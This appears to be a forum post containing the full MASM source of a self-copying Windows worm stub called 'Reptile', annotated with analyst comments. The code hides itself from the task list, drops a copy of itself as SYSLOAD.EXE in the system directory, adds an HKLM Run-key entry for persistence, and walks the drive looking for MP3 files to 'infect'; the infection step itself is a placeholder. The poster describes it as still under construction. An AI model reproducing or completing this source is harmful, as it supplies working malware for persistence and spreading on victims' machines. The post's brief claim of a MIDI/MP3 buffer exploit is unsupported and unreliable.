There is an exploit for MIDI files that changes the tags and sets the buffer to 0xfffffffff, as for MP3.
; Syntax/target: MASM (Intel syntax), 32-bit x86, flat memory model, StdCall.
; ANALYST NOTE: this listing is a self-copying worm stub (value name "Reptile").
; Behaviour visible in this source (see Main / FindVictims / ParseResult):
;   - copies its own executable to <SystemDirectory>\SYSLOAD.EXE (CopyFile, overwrite)
;   - persists via HKLM\Software\Microsoft\Windows\CurrentVersion\Run, value "Reptile"
;   - resolves kernel32!RegisterServiceProcess (Windows 9x-era export) to hide from
;     the "Close Program" dialog
;   - walks the current drive from "\" recursively and flags files ending in ".mp3";
;     in this listing the "infection" step is only a MessageBox - no payload is present
; Detection pointers: the Run-key value name, the SYSLOAD.EXE drop path and the
; root-to-leaf directory enumeration are the stable indicators in this source.
.386
.Model Flat ,StdCall
option casemap:none
include ..\..\include\windows.inc
include ..\..\include\kernel32.inc
include ..\..\include\user32.inc
include ..\..\include\advapi32.inc
includelib ..\..\lib\kernel32.lib
includelib ..\..\lib\user32.lib
includelib ..\..\lib\advapi32.lib
; Initialised data: the strings below are the sample's static indicators.
.Data
residentname db "\SYSLOAD.EXE",0           ; appended to the system directory -> drop path (Main)
regserviceproc db "RegisterServiceProcess",0 ; kernel32 export resolved by name via GetProcAddress (Main)
kernel32str db "kernel32.dll",0             ; module passed to LoadLibraryA (Main)
subkey db "Software\Microsoft\Windows\CurrentVersion\Run",0 ; persistence key under HKEY_LOCAL_MACHINE
keyname db "Reptile",0                      ; Run value name; also the MessageBox text shown at exit
searchpattern db "???*",0                   ; FindFirstFile pattern; presumably meant to skip "." and ".." - verify
rootdir db "\",0                            ; enumeration starts at the root of the current drive
previousdir db "..",0                       ; used to climb back out of a directory after enumerating it
; Uninitialised data (zero-filled at load).
.Data?
searchindex dd ?                            ; recursion depth = index of the current slot in searchhandles
wormlocation dd ?                           ; path of the running executable, parsed from GetCommandLine
keyhandle dd ?                              ; HKEY returned by RegCreateKeyEx
finddata WIN32_FIND_DATA <>                 ; shared by every recursion level; refilled by each FindNextFile
systemdir db MAX_PATH dup(?)                ; GetSystemDirectory result + residentname
searchhandles db 3FCh dup(?) ;255 dwords    ; find-handle stack, one dword per depth level (slot 0 unused);
                                            ; no bound check on searchindex is visible in FindVictims
.Code
;-----------------------------------------------------------------------
; Main - process entry point (no parameters, never returns; ends in ExitProcess).
; Sequence: hide from task list -> locate own image -> drop copy -> add Run value
;           -> enumerate the drive (FindVictims) -> MessageBox -> exit.
; Registers: eax/edx/esi/edi are scratch throughout; ebx is used by FindVictims.
;-----------------------------------------------------------------------
Main:
nop
worm_start:
mov eax,worm_end - worm_start               ; size of the code body; discarded by the next invoke (unused)
;=======Hide myself from "Close Program" Dialog=======
invoke LoadLibraryA,addr kernel32str        ; eax = hKernel32
invoke GetProcAddress,eax,addr regserviceproc ; eax = &RegisterServiceProcess (NULL if the export is absent; not checked)
push 1                                      ; dwType = 1 (RSP_SIMPLE_SERVICE)
push NULL                                   ; dwProcessId = 0 -> current process
call eax                                    ; RegisterServiceProcess(0, 1); faults if eax is NULL
;==============Find the Name/path of the worm=========
invoke GetCommandLine                       ; eax -> process command line; it is modified in place below
inc eax                                     ; skip the first char, assumed to be the opening '"'
xor edx,edx                                 ; edx = 0 -> "closing quote found" state (set to 7 below if not)
xchg eax,esi                                ; esi = scan pointer
mov edi,esi                                 ; edi = start of the path (after the assumed quote)
GetNextChar:
lodsb
cmp al,'"'
je FoundEnd                                 ; closing quote terminates the path
cmp al, 00h
jne GetNextChar
push 7                                      ; hit NUL without a closing quote:
pop edx                                     ; edx != 0 marks the "no quotes" case (whole command line is the path)
FoundEnd:
dec esi                                     ; esi -> terminator ('"' or NUL)
xchg esi,edi                                ; edi -> terminator, esi -> path start
xor eax,eax
stosb                                       ; overwrite the terminator with NUL (truncates the command line in place)
test edx,edx
je NoQuotes                                 ; label name is inverted: this path is taken when a closing quote WAS found
dec esi                                     ; no quotes: undo the "inc eax" above so the first char is kept
NoQuotes:
mov wormlocation,esi                        ; source path for CopyFile below
;==============Copy it to the system directory========
invoke GetSystemDirectory, addr systemdir, SIZEOF systemdir
invoke lstrcat, addr systemdir, addr residentname ; systemdir = "<sysdir>\SYSLOAD.EXE"
invoke CopyFile, wormlocation, addr systemdir, FALSE ; bFailIfExists = FALSE -> overwrites an existing copy; result not checked
;==============Make it run when Windows starts========
; RegCreateKeyEx(HKLM, subkey, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_WRITE, NULL, &keyhandle, NULL)
invoke RegCreateKeyEx, HKEY_LOCAL_MACHINE, addr subkey, NULL, \
NULL, REG_OPTION_NON_VOLATILE, KEY_WRITE, NULL, \
addr keyhandle, NULL
invoke lstrlen, addr systemdir              ; eax = byte length of the drop path (excludes the NUL)
; RegSetValueEx(keyhandle, "Reptile", 0, REG_SZ, systemdir, eax) - the Run value points at the dropped copy
invoke RegSetValueEx, keyhandle, addr keyname, NULL, REG_SZ, \
addr systemdir, eax
invoke SetCurrentDirectory,addr rootdir     ; start the walk at the root of the current drive
Call FindVictims                            ; recursive enumeration; returns when the whole tree is done
;==============Clean Up===============================
invoke RegCloseKey, keyhandle
invoke MessageBoxA,NULL, addr keyname,NULL,MB_OK ; visible artefact: a box whose text is "Reptile"
invoke ExitProcess,NULL
;==============Find MP3 files to infect===============
;-----------------------------------------------------------------------
; FindVictims - enumerate the current directory and recurse into subdirectories.
; Calling convention: internal (Call/ret), no arguments, no return value.
; Registers: ebx = find handle of the level being enumerated (callee-clobbered;
;            the caller's handle is restored from searchhandles, not from the stack).
; Globals:   searchindex   = current depth, incremented on entry, decremented on exit
;            searchhandles = per-depth find handle (slot searchindex)
;            finddata      = shared WIN32_FIND_DATA, filled by FindFirstFile/FindNextFile
; Recursion: ParseResult calls back into this proc for every directory entry, so the
;            depth is bounded only by the tree; no check against the 255-slot table is visible.
;-----------------------------------------------------------------------
FindVictims proc
invoke FindFirstFile, addr searchpattern, addr finddata ; eax = handle or INVALID_HANDLE_VALUE (-1)
inc eax                                     ; -1 -> 0: failure test without a cmp
je BackOneDir                               ; nothing matched: climb out (also runs at the root, where there is nothing to undo)
dec eax                                     ; restore the handle
inc searchindex                             ; enter one level deeper
mov ecx, searchindex
lea edi, [searchhandles+4*ecx]              ; slot for this depth; no upper-bound check
stosd                                       ; searchhandles[depth] = handle
xchg ebx,eax                                ; ebx = handle for this level
jmp CallParseRoutine                        ; process the first entry before calling FindNextFile
FindNext:
invoke FindNextFile, ebx, addr finddata     ; refills finddata (undoes any in-place edits ParseResult made)
test eax,eax
je FinishSearch                             ; no more entries
CallParseRoutine:
Call ParseResult                            ; may recurse into this proc and change ebx
jmp FindNext
FinishSearch:
invoke FindClose, ebx
dec searchindex                             ; leave this level
mov ecx, searchindex
test ecx,ecx
je SearchFinished                           ; depth 0: the walk is complete, no parent handle to restore
lea esi, [searchhandles+4*ecx]
lodsd                                       ; eax = parent's handle
xchg eax,ebx                                ; ebx = parent's handle again
BackOneDir:
invoke SetCurrentDirectory, addr previousdir ; cd ..
SearchFinished:
ret
FindVictims endp
;==============Process result of FindFile*============
;-----------------------------------------------------------------------
; ParseResult - handle one entry in finddata: report ".mp3" files, descend into directories.
; Calling convention: internal (Call/ret), no arguments, no return value.
; In:    finddata filled by FindFirstFile/FindNextFile (global, edited in place here)
; Clobb: eax, ecx, edx, esi, edi, flags; ebx via the recursive FindVictims call
; Note:  the "infection" step is only a MessageBoxA in this listing - no file is modified.
;-----------------------------------------------------------------------
ParseResult proc
lea edi, finddata.cFileName
invoke CharLower, edi                       ; lowercase the name in place so the extension compare is case-insensitive
invoke lstrlen, edi                         ; eax = name length
lea esi, [finddata.cFileName-4+eax]         ; -> last 4 bytes; for names shorter than 4 chars this points before cFileName
lodsd                                       ; eax = last 4 chars as a little-endian dword
sub eax, '3pm.' ;Infect MP3 Files           ; '3pm.' is the packed immediate whose memory image is ".mp3"
jne NotMp3
invoke MessageBoxA,NULL,edi,NULL,MB_OK ;'Twas an MP3 ; placeholder: shows the file name, nothing else happens
NotMp3:
and finddata.dwFileAttributes,FILE_ATTRIBUTE_DIRECTORY ; destructive test: other attribute bits are cleared (refilled by the next FindNextFile)
je NotDirectory
mov word ptr [finddata.cFileName-2], "\."   ; writes bytes ".\" into the two bytes preceding cFileName (tail of dwReserved1)
invoke SetCurrentDirectory,addr finddata.cFileName-2 ; cd ".\<name>"
Call FindVictims                            ; recurse; FindVictims does the matching "cd .." on return
NotDirectory:
ret
ParseResult endp
worm_end:                                   ; end marker for the size computed (and discarded) at the top of Main
End Main
Still under construction, but there are lots of holes and, as jonconley said, it would be software-dependent, etc.